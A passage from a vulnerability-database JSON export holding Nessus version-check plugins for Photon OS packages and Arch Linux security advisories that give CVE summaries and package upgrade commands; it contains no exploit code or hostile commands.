value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the binutils package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-321.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-35494\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:binutils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'binutils-2.32-3.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'binutils-devel-2.32-3.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'binutils');\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-02-28T01:12:47", "description": "An update of the salt3 package has been released.", "edition": 1, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 1.0: Salt3 PHSA-2021-1.0-0364", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-35662", "CVE-2021-25283", "CVE-2021-25284", "CVE-2021-3197", "CVE-2020-28972", "CVE-2021-3148", "CVE-2021-25281", "CVE-2021-25282", "CVE-2020-28243", "CVE-2021-3144"], "modified": "2021-02-27T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt3", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2021-1_0-0364_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/146877", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-1.0-0364. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146877);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2020-28243\",\n \"CVE-2020-28972\",\n \"CVE-2020-35662\",\n \"CVE-2021-25281\",\n \"CVE-2021-25282\",\n \"CVE-2021-25283\",\n \"CVE-2021-25284\",\n \"CVE-2021-3144\",\n \"CVE-2021-3148\",\n \"CVE-2021-3197\"\n );\n\n script_name(english:\"Photon OS 1.0: Salt3 PHSA-2021-1.0-0364\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-364.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3197\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 1.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-api-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-cloud-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-master-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-minion-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-proxy-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-spm-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-ssh-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt3-syndic-2019.2.4-2.ph1')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'salt3');\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-28T01:12:48", "description": "An update of the go package has been released.", "edition": 1, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 3.0: Go PHSA-2021-3.0-0200", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3115"], "modified": "2021-02-27T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:go", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0200_GO.NASL", "href": "https://www.tenable.com/plugins/nessus/146875", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0200. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146875);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\"CVE-2021-3115\");\n\n script_name(english:\"Photon OS 3.0: Go PHSA-2021-3.0-0200\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the go package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-200.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3115\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:go\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'go-1.13.15-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'go-md2man-2.0.0-4.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'go');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-28T01:12:48", "description": "An update of the salt3 package has been released.", "edition": 1, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 3.0: Salt3 PHSA-2021-3.0-0200", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-35662", "CVE-2021-25283", "CVE-2020-28972", "CVE-2021-3148", "CVE-2021-25281", "CVE-2021-25282", "CVE-2020-28243", "CVE-2021-3144"], "modified": "2021-02-27T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt3", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0200_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/146874", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0200. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146874);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2020-28243\",\n \"CVE-2020-28972\",\n \"CVE-2020-35662\",\n \"CVE-2021-25281\",\n \"CVE-2021-25282\",\n \"CVE-2021-25283\",\n \"CVE-2021-3144\",\n \"CVE-2021-3148\"\n );\n\n script_name(english:\"Photon OS 3.0: Salt3 PHSA-2021-3.0-0200\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-200.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3148\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-api-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-cloud-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-master-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-minion-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-proxy-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-spm-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-ssh-2019.2.8-3.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', reference:'salt3-syndic-2019.2.8-3.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'salt3');\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "archlinux": [{"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-36242"], "description": "Arch Linux Security Advisory ASA-202102-36\n==========================================\n\nSeverity: Medium\nDate : 2021-02-27\nCVE-ID : CVE-2020-36242\nPackage : python-cryptography\nType : incorrect calculation\nRemote : No\nLink : https://security.archlinux.org/AVG-1541\n\nSummary\n=======\n\nThe package python-cryptography before version 3.4-1 is vulnerable to\nincorrect calculation.\n\nResolution\n==========\n\nUpgrade to 3.4-1.\n\n# pacman -Syu \"python-cryptography>=3.4-1\"\n\nThe problem has been fixed upstream in version 3.4.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIn python-cryptography before version 3.3.2, certain sequences of\nupdate calls to symmetrically encrypt multiple gigabytes of data could\nresult in an integer overflow, leading to mishandling of buffers.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://github.com/pyca/cryptography/security/advisories/GHSA-rhm9-p9w5-fwm7\nhttps://github.com/pyca/cryptography/issues/5615\nhttps://github.com/pyca/cryptography/pull/5747\nhttps://github.com/pyca/cryptography/commit/82b6ce28389f0a317bc55ba2091a74b346db7cae\nhttps://security.archlinux.org/CVE-2020-36242\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-36", "href": "https://security.archlinux.org/ASA-202102-36", "type": "archlinux", "title": "[ASA-202102-36] python-cryptography: incorrect calculation", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21240"], "description": "Arch Linux Security Advisory ASA-202102-35\n==========================================\n\nSeverity: Medium\nDate : 2021-02-27\nCVE-ID : CVE-2021-21240\nPackage : python-httplib2\nType : denial of service\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1546\n\nSummary\n=======\n\nThe package python-httplib2 before version 0.19.0-1 is vulnerable to\ndenial of service.\n\nResolution\n==========\n\nUpgrade to 0.19.0-1.\n\n# pacman -Syu \"python-httplib2>=0.19.0-1\"\n\nThe problem has been fixed upstream in version 0.19.0.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIn python-httplib2 before version 0.19.0, a malicious server which\nresponds with long series of \"\\xa0\" characters in the \"www-\nauthenticate\" header may cause Denial of Service (CPU burn while\nparsing header) of the httplib2 client accessing said server. This is\nfixed in version 0.19.0 which contains a new implementation of auth\nheaders parsing using the pyparsing library.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m\nhttps://github.com/httplib2/httplib2/pull/182\nhttps://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc\nhttps://security.archlinux.org/CVE-2021-21240\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-35", "href": "https://security.archlinux.org/ASA-202102-35", "type": "archlinux", "title": "[ASA-202102-35] python-httplib2: denial of service", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20247"], "description": "Arch Linux Security Advisory ASA-202102-38\n==========================================\n\nSeverity: High\nDate : 2021-02-27\nCVE-ID : CVE-2021-20247\nPackage : isync\nType : directory traversal\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1598\n\nSummary\n=======\n\nThe package isync before version 1.3.5-1 is vulnerable to directory\ntraversal.\n\nResolution\n==========\n\nUpgrade to 1.3.5-1.\n\n# pacman -Syu \"isync>=1.3.5-1\"\n\nThe problem has been fixed upstream in version 1.3.5.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA security issue was found in isync/mbsync before versions 1.3.5 and\n1.4.1. Validations of the mailbox names returned by IMAP LIST/LSUB do\nnot occur, allowing a malicious or compromised server to use specially\ncrafted mailbox names containing '..' path components to access data\noutside the designated mailbox on the opposite end of the\nsynchronization channel.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://www.openwall.com/lists/oss-security/2021/02/22/1\nhttps://sourceforge.net/p/isync/isync/ci/fe5d59f8e3169944e57eb1c60155c9ebd4912d48/\nhttps://security.archlinux.org/CVE-2021-20247\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-38", "href": "https://security.archlinux.org/ASA-202102-38", "type": "archlinux", "title": "[ASA-202102-38] isync: directory traversal", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-8625"], "description": "Arch Linux Security Advisory ASA-202102-40\n==========================================\n\nSeverity: High\nDate : 2021-02-27\nCVE-ID : CVE-2020-8625\nPackage : bind\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1589\n\nSummary\n=======\n\nThe package bind before version 9.16.12-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 9.16.12-1.\n\n# pacman -Syu \"bind>=9.16.12-1\"\n\nThe problem has been fixed upstream in version 9.16.12.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA security issue was found in BIND 9.5.0 up to 9.11.27, 9.12.0 up to\n9.16.11, and versions BIND 9.11.3-S1 up to 9.11.27-S1 and 9.16.8-S1 up\nto 9.16.11-S1 of BIND Supported Preview Edition, as well as the release\nversions 9.17.0 and 9.17.1 of the BIND 9.17 development branch. A\nvulnerability in BIND's GSSAPI security policy can be targeted by a\nbuffer overflow attack.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://kb.isc.org/docs/cve-2020-8625\nhttps://downloads.isc.org/isc/bind9/9.16.12/patches/CVE-2020-8625.patch\nhttps://security.archlinux.org/CVE-2020-8625\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-40", "href": "https://security.archlinux.org/ASA-202102-40", "type": "archlinux", "title": "[ASA-202102-40] bind: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23840", "CVE-2021-23841"], "description": "Arch Linux Security Advisory ASA-202102-42\n==========================================\n\nSeverity: Medium\nDate : 2021-02-27\nCVE-ID : CVE-2021-23840 CVE-2021-23841\nPackage : openssl\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1581\n\nSummary\n=======\n\nThe package openssl before version 1.1.1.j-1 is vulnerable to multiple\nissues including denial of service and incorrect calculation.\n\nResolution\n==========\n\nUpgrade to 1.1.1.j-1.\n\n# pacman -Syu \"openssl>=1.1.1.j-1\"\n\nThe problems have been fixed upstream in version 1.1.1.j.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-23840 (incorrect calculation)\n\nCalls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may\noverflow the output length argument in some cases where the input\nlength is close to the maximum permissable length for an integer on the\nplatform. In such cases the return value from the function call will be\n1 (indicating success), but the output length value will be negative.\nThis could cause applications to behave incorrectly or crash.\n\nOpenSSL versions 1.1.1i and below are affected by this issue. Users of\nthese versions should upgrade to OpenSSL 1.1.1j.\n\nOpenSSL versions 1.0.2x and below are affected by this issue. However\nOpenSSL 1.0.2 is out of support and no longer receiving public updates.\nPremium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y.\nOther users should upgrade to 1.1.1j.\n\nFixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL\n1.0.2y (Affected 1.0.2-1.0.2x).\n\n- CVE-2021-23841 (denial of service)\n\nThe OpenSSL public API function X509_issuer_and_serial_hash() attempts\nto create a unique hash value based on the issuer and serial number\ndata contained within an X509 certificate. However it fails to\ncorrectly handle any errors that may occur while parsing the issuer\nfield (which might occur if the issuer field is maliciously\nconstructed). This may subsequently result in a NULL pointer deref and\na crash leading to a potential denial of service attack.\n\nThe function X509_issuer_and_serial_hash() is never directly called by\nOpenSSL itself so applications are only vulnerable if they use this\nfunction directly and they use it on certificates that may have been\nobtained from untrusted sources.\n\nOpenSSL versions 1.1.1i and below are affected by this issue. Users of\nthese versions should upgrade to OpenSSL 1.1.1j.\n\nOpenSSL versions 1.0.2x and below are affected by this issue. However\nOpenSSL 1.0.2 is out of support and no longer receiving public updates.\nPremium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y.\nOther users should upgrade to 1.1.1j.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://www.openssl.org/news/secadv/20210216.txt\nhttps://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1\nhttps://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2\nhttps://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8130d654d1de922ea224fa18ee3bc7262edc39c0\nhttps://security.archlinux.org/CVE-2021-23840\nhttps://security.archlinux.org/CVE-2021-23841\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-42", "href": "https://security.archlinux.org/ASA-202102-42", "type": "archlinux", "title": "[ASA-202102-42] openssl: multiple issues", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-28243", "CVE-2020-28972", "CVE-2020-35662", "CVE-2021-25281", "CVE-2021-25282", "CVE-2021-25283", "CVE-2021-25284", "CVE-2021-3144", "CVE-2021-3148", "CVE-2021-3197"], "description": "Arch Linux Security Advisory ASA-202102-33\n==========================================\n\nSeverity: High\nDate : 2021-02-27\nCVE-ID : CVE-2020-28243 CVE-2020-28972 CVE-2020-35662 CVE-2021-3144\nCVE-2021-3148 CVE-2021-3197 CVE-2021-25281 CVE-2021-25282\nCVE-2021-25283 CVE-2021-25284\nPackage : salt\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1624\n\nSummary\n=======\n\nThe package salt before version 3002.5-3 is vulnerable to multiple\nissues including access restriction bypass, arbitrary command\nexecution, certificate verification bypass, cross-site scripting,\ninsufficient validation, privilege escalation, directory traversal and\ninformation disclosure.\n\nResolution\n==========\n\nUpgrade to 3002.5-3.\n\n# pacman -Syu \"salt>=3002.5-3\"\n\nThe problems have been fixed upstream in version 